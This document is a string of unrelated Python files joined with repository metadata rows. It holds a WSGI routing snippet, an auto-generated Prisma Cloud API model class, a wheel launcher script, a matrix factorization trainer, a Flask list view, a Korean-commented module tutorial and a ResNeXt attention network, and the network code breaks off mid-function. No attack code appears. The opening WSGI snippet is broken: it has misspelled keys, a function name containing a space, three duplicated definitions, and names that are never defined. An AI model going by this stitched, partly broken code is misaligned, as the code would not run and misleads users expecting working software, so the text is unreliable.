PYTHON_DIR="./wsgiPy"
class Application(object):
def __init__(self,urls):
self.urls=urls
def __call__(self,env,set_headers):
path=env.get('PARH_INFO','/')
if path.startswith('static'):
file_name=path[7:]
try:
fd=open(HTML_ROOT_DIR,'rb')
except IOError:
status='404 not fount'
headers=[]
set_headers(status,headers)
return "<h1>===没找到===<h1>"
else:
file_data=fd.read()
fd.close()
status='200 OK'
headers=[]
set_headers(status,headers)
return file_data.decode('utf-8')
else:
for url,handler in self.urls:
if path==url:
return handler(env,set_headers)
status="404 not found"
headers=[]
set_headers(status,headers)
return "sorry url not found"
def show _time(env,set_headers):
status="200 OK"
headers=[]
set_headers(status,headers)
return time.ctime()
def show _time(env,set_headers):
status="200 OK"
headers=[]
set_headers(status,headers)
return time.ctime()
def show _time(env,set_headers):
status="200 OK"
headers=[]
set_headers(status,headers)
return time.ctime()
urls=[
('/time',show_time),
('/hello',say_hello),
('/bye',say_bye),
("/xiaoyang",yang)
]
app=Application(urls)
| [
"[email protected]"
]
| |
09dc93bf160fae79ae292d82e8e5f44287276cfe | 70bee1e4e770398ae7ad9323bd9ea06f279e2796 | /openapi_client/models/waas_path.py | 628e708d4edce2b96dbb415798f282ec876d858b | []
| no_license | hi-artem/twistlock-py | c84b420b1e582b3c4cf3631eb72dac6d659d4746 | 9888e905f5b9d3cc00f9b84244588c0992f8e4f4 | refs/heads/main | 2023-07-18T07:57:57.705014 | 2021-08-22T04:36:33 | 2021-08-22T04:36:33 | 398,637,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,597 | py | # coding: utf-8
"""
Prisma Cloud Compute API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 21.04.439
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class WaasPath(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'methods': 'list[WaasMethod]',
'path': 'str'
}
attribute_map = {
'methods': 'methods',
'path': 'path'
}
def __init__(self, methods=None, path=None, local_vars_configuration=None): # noqa: E501
"""WaasPath - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._methods = None
self._path = None
self.discriminator = None
if methods is not None:
self.methods = methods
if path is not None:
self.path = path
@property
def methods(self):
"""Gets the methods of this WaasPath. # noqa: E501
Supported operations for the path (e.g., PUT, GET, etc.). # noqa: E501
:return: The methods of this WaasPath. # noqa: E501
:rtype: list[WaasMethod]
"""
return self._methods
@methods.setter
def methods(self, methods):
"""Sets the methods of this WaasPath.
Supported operations for the path (e.g., PUT, GET, etc.). # noqa: E501
:param methods: The methods of this WaasPath. # noqa: E501
:type methods: list[WaasMethod]
"""
self._methods = methods
@property
def path(self):
"""Gets the path of this WaasPath. # noqa: E501
Relative path to an endpoint such as \\\"/pet/{petId}\\\". # noqa: E501
:return: The path of this WaasPath. # noqa: E501
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""Sets the path of this WaasPath.
Relative path to an endpoint such as \\\"/pet/{petId}\\\". # noqa: E501
:param path: The path of this WaasPath. # noqa: E501
:type path: str
"""
self._path = path
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WaasPath):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, WaasPath):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
]
| |
db766e679ad5d5b29b11e5227f416641d4615582 | 8a39a9092e468ae0b0f1cbaa120ec9cb073ea99a | /flaskapp/bin/wheel | 6cf1bd3c2fac09220ced09d1f4faf7538fb92369 | []
| no_license | UPstartDeveloper/Mad_Libs | 717d840dfaebf837a0ec8b7d41360557bdd28ba7 | b103051afdc38693e07deb6fb66b3b992b032a3b | refs/heads/master | 2020-07-14T07:18:58.575014 | 2019-09-09T19:06:50 | 2019-09-09T19:06:50 | 205,271,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | #!/Users/zainraza/Documents/dev/courses/MadLibs/flaskapp/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
]
| ||
a536bdcbf7d2e262cdcd57fb7576a6c706c7c063 | fcbf910c46991955159a11a34573d3bbb2c8bb90 | /test/serial/mf_mapping.py | fa9f5612f9e55757f82782376fecec5ea9607cbd | [
"BSD-2-Clause",
"BSD-3-Clause"
]
| permissive | xunzhang/paracel | 59114aa63e46b844e56e1089dae633e55150875a | 553598a1f4c942c80157adfc23c2cd3fe0dab333 | refs/heads/develop | 2020-05-19T08:57:50.643425 | 2015-06-14T16:44:49 | 2015-06-14T16:44:49 | 14,230,290 | 13 | 3 | null | 2014-12-09T16:24:44 | 2013-11-08T10:37:14 | C++ | UTF-8 | Python | false | false | 3,221 | py | #! /usr/bin/env python
#
# Matrix factorization with bias
#
import numpy as np
class mf():
def __init__(self, k = 100, rounds = 10, alpha = 0.001, beta = 0.01, train_fn = '', pred_fn = '', output = ''):
self.k = k
self.rounds = rounds
self.alpha = alpha
self.beta = beta
self.train_fn = train_fn
self.pred_fn = pred_fn
self.output = output
self.usr_dct = {}
self.item_dct = {}
self.rating_graph = {}
self.rating_sz = 0
self.miu = 0.
self.rmse = 0.
self.p = None
self.q = None
self.usr_bias = None
self.item_bias = None
def load(self):
f = open(self.train_fn)
for line in f:
uid, iid, rating = line.strip('\n').split(',')
rating = float(rating)
if uid not in self.usr_dct:
self.usr_dct[uid] = len(self.usr_dct)
if iid not in self.item_dct:
self.item_dct[iid] = len(self.item_dct)
self.rating_graph.setdefault(self.usr_dct[uid], []).append((self.item_dct[iid], rating))
self.rating_sz += 1
self.miu += rating
self.miu /= self.rating_sz
f.close()
def estimate(self, i, j):
return self.miu + self.usr_bias[i] + self.item_bias[j] + np.dot(self.p[i, :], self.q[j, :])
def cal_rmse(self):
import math
self.rmse = 0.
for u_indx, pair in self.rating_graph.iteritems():
for i_indx, rating in pair:
self.rmse += (rating - self.estimate(u_indx, i_indx)) ** 2
return math.sqrt(self.rmse / self.rating_sz)
def learning(self):
#import time
self.p = np.random.rand(len(self.usr_dct), self.k)
self.q = np.random.rand(len(self.item_dct), self.k)
self.usr_bias = np.random.rand(len(self.usr_dct))
self.item_bias = np.random.rand(len(self.item_dct))
# learning
for rd in xrange(self.rounds):
#start = time.time()
for u_indx, pair in self.rating_graph.iteritems():
for i_indx, rating in pair:
e = rating - self.estimate(u_indx, i_indx)
# compute delta
delta_p = self.alpha * (2 * e * self.q[i_indx, :] - self.beta * self.p[u_indx, :])
delta_q = self.alpha * (2 * e * self.p[u_indx, :] - self.beta * self.q[i_indx, :])
delta_ubias = self.alpha * (2 * e - self.beta * self.usr_bias[u_indx])
delta_ibias = self.alpha * (2 * e - self.beta * self.item_bias[i_indx])
# update with delta
self.p[u_indx, :] += delta_p
self.q[i_indx, :] += delta_q
self.usr_bias[u_indx] += delta_ubias
self.item_bias[i_indx] += delta_ibias
def solve(self):
self.load()
self.learning()
def predict_rating(self):
f1 = open(self.pred_fn)
f2 = open(self.output, 'w')
for line in f1:
uid, iid = line.strip('\n').split(',')
u_indx = self.usr_dct[uid]
i_indx = self.item_dct[iid]
pred_rating = self.estimate(u_indx, i_indx)
f2.write('%s,%s,%s\n' % (uid, iid, pred_rating))
f1.close()
f2.close()
if __name__ == '__main__':
mf_solver = mf(k = 80, rounds = 3, alpha = 0.005, beta = 0.02, train_fn = '/mfs/user/wuhong/paracel/test/serial/training.csv', pred_fn = '/mfs/alg/Rec_Competition/predict.csv', output = '/mfs/user/wuhong/paracel/test/serial/mf_result')
mf_solver.solve()
print mf_solver.cal_rmse()
mf_solver.predict_rating()
| [
"[email protected]"
]
| |
cb02f43cde2d805ac8b14cabc69256dfad851d6a | fec36e7493a78575cd0320bf31c5080649863a06 | /src/views/feature_value/list.py | 2294b96b083b882991877221f5e144dc233b810e | []
| no_license | teimurjan/eye8-backend | 6f44e830dd17dcac8b23acc3b66b9918357f643b | bf0a4c894a5b3770fada269d8b4d7d72367ab1ba | refs/heads/master | 2023-06-30T01:34:38.358903 | 2021-06-23T10:06:29 | 2021-06-23T10:06:29 | 273,144,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,287 | py | from src.validation_rules.feature_value.create import (
CreateFeatureValueData,
CreateFeatureValueDataValidator,
)
from typing import Type
from src.serializers.feature_value import FeatureValueSerializer
from src.constants.status_codes import OK_CODE
from src.errors import InvalidEntityFormat
from src.services.feature_value import FeatureValueService
from src.views.base import PaginatableView, ValidatableView
class FeatureValueListView(ValidatableView[CreateFeatureValueData], PaginatableView):
def __init__(
self,
validator: CreateFeatureValueDataValidator,
service: FeatureValueService,
serializer_cls: Type[FeatureValueSerializer],
):
super().__init__(validator)
self._service = service
self._serializer_cls = serializer_cls
def get(self, request):
pagination_data = self._get_pagination_data(request)
meta = None
feature_values = []
if pagination_data:
feature_values, count = self._service.get_all(
offset=pagination_data["offset"], limit=pagination_data["limit"]
)
meta = self._get_meta(
count, pagination_data["page"], pagination_data["limit"]
)
else:
feature_values, _ = self._service.get_all()
raw_intl = request.args.get("raw_intl") == "1"
serialized_feature_values = [
self._serializer_cls(feature_value)
.in_language(None if raw_intl else request.language)
.with_serialized_feature_type()
.serialize()
for feature_value in feature_values
]
return {"data": serialized_feature_values, "meta": meta}, OK_CODE
def post(self, request):
try:
valid_data = self._validate(request.get_json())
feature_value = self._service.create(valid_data, user=request.user)
serialized_feature_value = (
self._serializer_cls(feature_value)
.with_serialized_feature_type()
.serialize()
)
return {"data": serialized_feature_value}, OK_CODE
except self._service.FeatureTypeInvalid:
raise InvalidEntityFormat({"feature_type_id": "errors.invalidID"})
| [
"[email protected]"
]
| |
54fa9a542b276fcf3b2261c362e3d446b891570a | ce9c2603167e1b30b222afd5206ac7fa31d19a77 | /imctools/io/errors.py | dfd219570e7d15482e270e2b063e25a27abc5522 | [
"MIT"
]
| permissive | BodenmillerGroup/imctools | 6d07036045a6361e17811d8f675eab01f34ffade | 361e49f3e0de4cf9c58c3b6d1024feacd2855d98 | refs/heads/master | 2022-05-01T23:29:49.302686 | 2022-03-31T09:58:01 | 2022-03-31T09:58:01 | 68,657,395 | 21 | 14 | MIT | 2022-03-31T09:58:02 | 2016-09-20T00:16:24 | Python | UTF-8 | Python | false | false | 75 | py | class AcquisitionError(Exception):
"""An error with IMC acquisition"""
| [
"[email protected]"
]
| |
3901eb30debbc1c94cf3d40f80aa71a9a4ffbaa1 | 0b514feea82eaa2e341130d9e23d13d72271d644 | /2.Jump_to_python/Python07.py | 99deebb9aeec73d60845d030c9ca5481a5b33cec | []
| no_license | Jerrykim91/FromZero | f8478012130948a11978a46ab6ec7922cb354a8f | fdd5a0716b29c77019cfcd1e1eab7ed4afd1aed4 | refs/heads/master | 2022-12-25T15:04:22.656462 | 2020-10-10T14:35:06 | 2020-10-10T14:35:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,514 | py | # 모듈화 + 패키지
# + 모듈가져오기, 테스트 코드 배치 , 모듈가져오기 , 패키지 사용
# 모듈
# 함수나 변수 또는 클래스를 모아 놓은 파일이다.
# => 확장자가.py파일
# mod.py,__init__.py,p1.py, p2.py,...
# import 모듈이름
# 모듈이름.함수 모듈이름을 안쓰려면 -> from 모듈이름 import 모듈함수
# from mod1 import* -> * (모든것)을 의미
# 모듈화의 대상 => 변수, 함수, 클래스 <= 요소를 가져다 내것 처럼 사용가능
# 패키지
# 유사한 기능 끼리 묶어둔 디렉토리 ,유틸리티 , 통신 , gui등등 모아둔것
# 패키지 폴더 내에 __init__.py 이 파일은 하위 호환을 위해서 python3.3이하에서는 모두 사용한다.
# 그리고, __init__.py는 곧 해당 패키지 자체를 의미한다
#-------------------------------
# from 패키지.패키지....모듈\ import 변수,함수,클레스(필요한것들 열거)
from a.b.mod import PI, add
print(PI)
print(add(1,2))
# from 패키지.패키지 \ import 변수, 함수, 클래스
# 경로상 마지막 패키지(디렉토리)안에 있는 __init__.py에서 모듈을 가져온다
from a.b import PI2 as pi2 # PI2 -> pi2 이름 변경
print(pi2)
# 패키지명은 절대로 .들어가면 않된다!!
# 모듈명도 절대로 .들어가면 않된다!!
from a import PI3
print(PI3)
# 별칭 => 이름이 너무 길어서라든지, 이름 변경을 해서 사용하고 싶다면
# 원래이름 as 별칭
from a import PI3 as pi
print(pi)
# 가져올 모듈이 너무 많다. 다 가져왔으면 좋겟다 => *
# 하위 호환을 위해서는
# __all__=['mod']
from a.b import *
print( mod.PI, PI2 )
# import만 사용시
import a.b.mod as m
print( m.PI )
import a.b as bm
print( bm.PI2 )
# 모듈을 가져온다는 것은 해당 모듈을 실행한다라고 봐도 무방하다->메모리 적제를 해야하니
# 내가 만든 모듈같은 경우 의도하지 않은 코드가 실행될수 있다
# => 테스트 할려고 만든 코드는 모듈 가져오기 수행시 실제로 구동되면 않된다
# => 이런 코드 처리가 필요하다 => __name__을 이용하여 처리 한다
# __name__을 사용하는 모듈을 직접 구동하면 "__main__"으로 나오고,
# 모듈로 사용되면(즉, 다른 모듀이 가져다 쓰면) "모듈명"으로 나온다
from Python08 import XMan
mu = XMan( '로건2', 100, 50, 51)
print( mu )
print('Python07 : __name__', __name__) | [
"[email protected]"
]
| |
86157b173385f4d53dbc01fa8e2417b7ee496c95 | f952a4583b0b751a1d5e2c5c453b16b1eb790ce5 | /networks/resnext_50_share_attention.py | db6b84562b8195c8267425a8f726e74a486801de | []
| no_license | dotpyu/Concept-Sharing-Network | 18b636a556cbc2dff887ac3c06110c58064393c8 | 2c85b312ef7d93a79498b5b3a8bc7b4d008e7b94 | refs/heads/master | 2022-04-11T02:07:16.387275 | 2020-03-30T20:44:36 | 2020-03-30T20:44:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,668 | py |
import torch
import torch.nn as nn
from torch.autograd import Variable
from functools import reduce
import pdb
from collections import OrderedDict
import torch.nn.functional as f
class LambdaBase(nn.Sequential):
def __init__(self, fn, *args):
super(LambdaBase, self).__init__(*args)
self.lambda_func = fn
def forward_prepare(self, input):
output = []
for module in self._modules.values():
output.append(module(input))
return output if output else input
class Lambda(LambdaBase):
def forward(self, input):
return self.lambda_func(self.forward_prepare(input))
class LambdaMap(LambdaBase):
def forward(self, input):
return list(map(self.lambda_func,self.forward_prepare(input)))
class LambdaReduce(LambdaBase):
def forward(self, input):
return reduce(self.lambda_func,self.forward_prepare(input))
resnext_50_32x4d = nn.Sequential( # Sequential,
nn.Conv2d(3,64,(7, 7),(2, 2),(3, 3),1,1,bias=False),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d((3, 3),(2, 2),(1, 1)),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(64,128,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128,128,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
),
nn.Conv2d(128,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
nn.Sequential( # Sequential,
nn.Conv2d(64,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(256,128,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128,128,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
),
nn.Conv2d(128,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(256,128,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128,128,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
),
nn.Conv2d(128,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(256,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(2, 2),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
nn.Sequential( # Sequential,
nn.Conv2d(256,512,(1, 1),(2, 2),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,256,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.Conv2d(256,256,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
),
nn.Conv2d(256,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(512,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(2, 2),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
nn.Sequential( # Sequential,
nn.Conv2d(512,1024,(1, 1),(2, 2),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,512,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.Conv2d(512,512,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
),
nn.Conv2d(512,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(1024,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
nn.Conv2d(1024,1024,(3, 3),(2, 2),(1, 1),1,32,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
),
nn.Conv2d(1024,2048,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
nn.Sequential( # Sequential,
nn.Conv2d(1024,2048,(1, 1),(2, 2),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(2048,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
nn.Conv2d(1024,1024,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
),
nn.Conv2d(1024,2048,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
nn.Sequential( # Sequential,
LambdaMap(lambda x: x, # ConcatTable,
nn.Sequential( # Sequential,
nn.Sequential( # Sequential,
nn.Conv2d(2048,1024,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
nn.Conv2d(1024,1024,(3, 3),(1, 1),(1, 1),1,32,bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
),
nn.Conv2d(1024,2048,(1, 1),(1, 1),(0, 0),1,1,bias=False),
nn.BatchNorm2d(2048),
),
Lambda(lambda x: x), # Identity,
),
LambdaReduce(lambda x,y: x+y), # CAddTable,
nn.ReLU(),
),
),
# nn.AvgPool2d((7, 7),(1, 1)),
# Lambda(lambda x: x.view(x.size(0),-1)), # View,
)
class resnext_car_multitask(nn.Module):
def __init__(self, cropsize=224, resnext_model=None, class_num=1, test=False, fc_num = 8, att_num = 9):
super(resnext_car_multitask, self).__init__()
self.resnext_car_multitask=resnext_50_32x4d
self.classifier = []
self.att = []
self.att_k = []
self.class_num = class_num
self.relu = nn.ReLU()
self.drop = nn.Dropout(p=0.5)
self.upsample = nn.Upsample(scale_factor=2)
self.ave_pool = nn.AvgPool2d((7, 7),(1, 1))
self.ave_pool2 = nn.AvgPool2d((2,2),(1, 1))
self.att_num = att_num
self.fc_num = fc_num
self.max_pool = nn.MaxPool2d((7,7),(1,1))
embed_size = 66
embed_size = 2048
k = 5
self.soft = nn.Softmax(2)
# for params in self.parameters():
# params.requires_grad = False
self.cropsize = cropsize
for params in self.parameters():
if params.ndimension()>1:
torch.nn.init.xavier_uniform(params)
else:
torch.nn.init.normal(params)
for i in range(self.att_num):
self.att.append(nn.Conv2d(1024,1,(3, 3),(2, 2),(1, 1),1, 1,bias=False))
self.att_k.append(nn.Parameter(torch.zeros(1,1,k), requires_grad=True))
self.att[i].weight.data.fill_(0)
for i in range(self.class_num):
self.classifier.append(nn.Linear(embed_size,2))
self.classifier = nn.ModuleList(self.classifier)
self.att_k = nn.ParameterList(self.att_k)
self.att = nn.ModuleList(self.att)
if False:
print('loading model')
params = torch.load(resnext_model)
keys = params.keys()
# pop 1000 fc for loading models
keys1 = list(keys)
pdb.set_trace()
if test:
new_state_dict = OrderedDict()
for k,v in params.items():
word = k.split('.')
l = len(word[0])
name = k[l+1:]
new_state_dict[name] = v
self.resnext_car_multitask.load_state_dict(params)
else:
params.pop(keys1[-1])
params.pop(keys1[-2])
self.resnext_car_multitask.load_state_dict(params)
def forward(self, x,att_index, fc_index):
x = x.view(-1, 3, self.cropsize, self.cropsize)
# x = self.resnext_car_multitask(x)
module1 = nn.Sequential(*list(self.resnext_car_multitask.children())[:-1])
module2 = nn.Sequential(*list(self.resnext_car_multitask.children())[-1])
x1 =module1(x)
x =module2(x1)
x_norm = x1.view(x1.size(0),x1.size(1),-1)
x_norm = f.normalize(x_norm,p=2,dim=2)
x_norm = x_norm.view(x1.size(0),x1.size(1),x1.size(2),x1.size(3))
outputs = []
outputs2 = []
# x = self.upsample(x)
x = x.view(x.size(0), x.size(1), -1)
for i in range(self.class_num):
att0 = self.att[att_index[i]](x_norm)
height = att0.size(2)
att0 = att0.repeat(1,x.size(1),1,1)
att0 = att0.view(x.size(0),x.size(1),-1 )
att0_k = self.att_k[att_index[i]]
att0_k = att0_k.repeat(x.size(0),x.size(1),1)
att0 = torch.cat((att0, att0_k), 2)
att0 = self.soft(att0)
att0 = att0[:,:,0:(height*height)]
x0 = torch.sum(torch.mul(x,att0),2)
outputs.append(self.classifier[i](self.drop(x0)))
return outputs, outputs2
def resnext50_fg_car(pretrained=False, model_dir='', class_num=1, test=False, **kwargs):
if pretrained:
# model_dict = torch.load(model_dir)
